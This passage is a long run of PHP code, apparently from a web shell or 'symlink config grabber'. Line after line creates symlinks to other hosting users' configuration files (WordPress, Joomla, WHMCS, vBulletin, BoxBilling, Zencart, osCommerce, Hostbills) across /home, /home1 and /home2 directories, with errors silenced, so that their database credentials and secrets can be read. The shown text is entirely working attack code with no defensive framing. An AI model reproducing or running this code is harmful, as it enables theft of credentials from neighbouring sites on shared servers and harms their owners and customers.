1345. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1346. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1347. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1348. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1349. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1350. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1351. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1352. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1353. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1354. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1355. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1356. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1357. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1358. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1359. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1360. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1361. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1362. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1363. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1364. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1365. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1366. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1367. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1368. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1369. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1370. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1371. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1372. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1373. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1374. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1375. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1376. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1377. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1378. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1379. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1380. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1381. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1382. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1383. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1384. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1385. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1386. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1387. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1388. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1389. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1390. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1391. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1392. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1393. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1394. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1395. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1396. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1397. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1398. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1399. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1400. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1401. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1402. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1403. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1404. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1405. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1406. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1407. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1408. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1409. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1410. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1411. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1412. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1413. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1414. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1415. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1416. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1417. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1418. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1419. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1420. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1421. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1422. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1423. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1424. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1425. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1426. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1427. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1428. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1429. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1430. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1431.  
1432. //Home1
1433.  
1434. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1435. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1436. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1437. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1438. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1439. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1440. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1441. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1442. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1443. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1444. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1445. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1446. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1447. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1448. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1449. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1450. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1451. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1452. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1453. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1454. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1455. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1456. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1457. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1458. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1459. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1460. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1461. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1462. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1463. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1464. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1465. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1466. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1467. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1468. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1469. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1470. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1471. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1472. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1473. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1474. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1475. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1476. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1477. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1478. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1479. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1480. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1481. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1482. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1483. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1484. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1485. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1486. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1487. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1488. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1489. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1490. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1491. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1492. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1493. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1494. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1495. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1496. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1497. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1498. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1499. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1500. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1501. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1502. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1503. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1504. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1505. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1506. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1507. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1508. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1509. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1510. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1511. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1512. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1513. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1514. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1515. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1516. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1517. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1518. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1519. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1520. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1521. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1522. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1523. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1524. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1525. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1526. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1527. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1528. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1529. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1530. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1531. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1532. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1533. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1534. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1535. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1536. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1537. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1538. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1539. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1540. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1541. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1542. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1543. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1544. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1545. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1546. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1547. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1548. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1549. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1550. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1551. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1552. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1553. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1554. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1555. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1556. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1557. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1558. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1559. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1560. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1561. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1562. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1563. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1564. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1565. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1566. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1567. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1568. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1569. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1570. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1571. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1572. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1573. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1574. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1575. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1576. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1577. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1578. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1579. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1580. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1581. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1582. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1583. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1584. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1585. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1586. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1587. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1588. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1589. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1590. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1591. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1592. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1593. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1594. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1595. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1596. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1597. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1598. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1599. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1600. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1601. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1602. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1603. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1604. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1605. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1606. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1607. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1608. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1609. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1610. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1611. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1612. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1613. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1614.  
1615. //Home2
1616.  
1617. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1618. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1619. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1620. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1621. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1622. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1623. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1624. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1625. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1626. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1627. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1628. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1629. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1630. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1631. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1632. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1633. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1634. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1635. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1636. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1637. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1638. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1639. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1640. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1641. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1642. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1643. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1644. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1645. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1646. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1647. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1648. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1649. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1650. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1651. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1652. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1653. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1654. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1655. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1656. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1657. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1658. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1659. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1660. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
